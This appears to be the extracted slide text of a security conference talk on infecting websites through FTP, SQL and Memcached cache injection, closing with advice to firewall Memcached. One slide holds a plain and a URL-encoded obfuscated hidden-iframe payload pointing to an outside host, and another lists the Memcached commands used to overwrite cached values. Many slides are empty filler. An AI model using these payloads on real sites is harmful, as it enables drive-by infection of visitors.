This document discusses techniques for infecting websites through cache injection attacks. It describes how an attacker can compromise a website by injecting an iframe or JavaScript that redirects visitors to a controlled webpage. It provides examples using Memcached, an unauthenticated caching system, to overwrite cache values with malicious content like iFrames linking to infection kits. The document demonstrates password sniffing and manipulating cached price data as potential attacks. It notes that while no public infections using these techniques have been seen, caching systems like Memcached that listen publicly pose an attractive target for attackers.

1. [FTP|SQL|Cache]
Injections
David Barroso
Head of Security Intelligence
Telefonica Digital

2. ddddddasdfsdf
27%
73%
http://www.iframeinjectionattack.com/how-to-remove-this-site-may-harm-your-computer.html

3. Introduction
Cache basics
Demo
Summary

4. How can I infect a web?
Or, how can I forward visitors to a controlled webpage?
Pág. 4

5. MPack
The attacker
compromises a Attacker
website and injects The malcode
an iFrame connects back
to the C&C
C&C
iFRAME
Infection kit Servidor Web legítimo
www.mydomain.com)
The visitor is
forwarded to an
infection kit
The visitor browses a
normal website (with User
a malicious iframe)
Pág. 5

6. First option
Difficulty: easy
Pág. 6

7. Pág. 7

8. Pág. 8

9. SQL Injection
Difficulty: easy
Pág. 9

10. Pág. 10

11. Pág. 11

12. Pág. 12

13. Pág. 13

14. A tener en cuenta
 Which users do I want to infect?
 Focus your efforts
 Example: brazilian webpages
 SEO and web ranking
 Alexa Ranking
 It’s not only about infection
 Sometimes is only about web ranking
 Spam comments in blogs
 Playing with HTML entities(ex. <noscript>)
Pág. 14
Pág. 14

15. Second options
Difficulty: medium
Pág. 15

16. Pág. 16

17. Pág. 17

18. Pág. 18

19. Pág. 19

20. Pág. 20

21. Pág. 21

22. Choose your preferred
infection kit
99% LAMP: Linux + Apache + Mysql + PHP
Pág. 22

23. Pág. 23

24. Pág. 24

25. Pág. 25

26. Pág. 26

27. Pág. 27

28. ddddddasdfsdf
 Simple: <iframe src=‘http://www.malicious.com’></iframe>
 Not so simple:
<Script Language='Javascript'>
27%
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%6
73%
3%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%
61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D
%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67
%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6
C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%
6E%3A%61%62%73%6F%6C%75%74%65%20%3E%3C%2F%69%66%72%61%6D
%65%3E'));
</Script>

29. And how a web cache is
related?
Specifically: memcached
Pág. 29

30. ddddddasdfsdf
Cache
 A component that transparently stores data so that future
requests for that data can be served faster. The data that is
stored within a cache might be values that have been
computed earlier or duplicates of original values that are
stored27%
elsewhere. (Wikipedia)
73%
 Examples: CPU, Disk, DNS, ARP, etc.
 Main security attack: poisoning

31. ddddddasdfsdf
73%
27%

32. ddddddasdfsdf
 Created on 2003 forLiveJournal
 Associative array(hash table)
 YouTube, Reddit, FaceBook,
Orange, Twitter, etc.
27%  Memory-based
 Keys (250b), Values (1MB)
73%  Default port: 11211/tcp
 No authentication
 Some caches are on the Internet
 Optional(not often used): SASL

33. ddddddasdfsdf
 Telnet based commands
 Commands
 Set (flags timeout bytes)
 Get
 Stats
27%
 Items
 Cachedump
73%

34. ddddddasdfsdf
 Sensepost analyzed the security issues back on 2010
 They developed go-derper.rb
 Identifcation
 Storage of k keys and values
 Regular expressiones
27%
 It can overwrite existing keys and values
73%
 Main problems
 Which web app is using these data?
 How can I find ‘interesting’ data?

36. Infections
iFrame/JS malicious
injection
Confidential information
Passwords
Prices!

37. Let’s see some practical
stuff
Take care with all those memcached!
Pág. 37

38. ddddddasdfsdf
Demo
Memcached access
27%
Key/value storage
73%

39. ddddddasdfsdf
 set FIRST 0 0 11
 Hello FIRST
 get FIRST
 stats items
27%
 stats cachedump n 10
73%

40. ddddddasdfsdf
Demo
Overwriting values
27%
(iFrame – infection kit)
73%

41. ddddddasdfsdf
 iFrame injection
27%
73%

42. ddddddasdfsdf
Demo
Password sniffing
27%
Data mangling (prices)
73%

43. ddddddasdfsdf
 Password sniffing
27%
73%

44. ddddddasdfsdf
 Data mangling (prices)
27%
73%

45. ddddddasdfsdf
 Data mangling (prices)
27%
73%

46. ddddddasdfsdf
27%
73%
Source: http://www.sensepost.com/blog/4873.html

47. ddddddasdfsdf
 CacheT: an alternative to FTP-Toolz
and SQL Injection Kitz
 go-derper.rb patch
 Proof of concept
27%
 Once you find some memcached
hosts(nmap) 73% entries
 Dump of all their
 Look for HTML data
 Malicious injection
(iFrame/JavaScript)
 Not published yet (only malicious
purposes)

48. ddddddasdfsdf
 Protect your memcached from external access
 Firewall
 Listen only to localhost
 We haven’t seen malicious infections using theses caches
 But it’s a very attractive asset, because many of the large
27%
websites are using it
 From the malicious point of view, it doesn’t mind if you don’t
73%
know which webapp is behind
 It’s very easy to code a tool scanning for open memcached (or
similar caches) and then infect all of them
 nmap + go-derper.rb

49. Obrigado
David Barroso
@lostinsecurity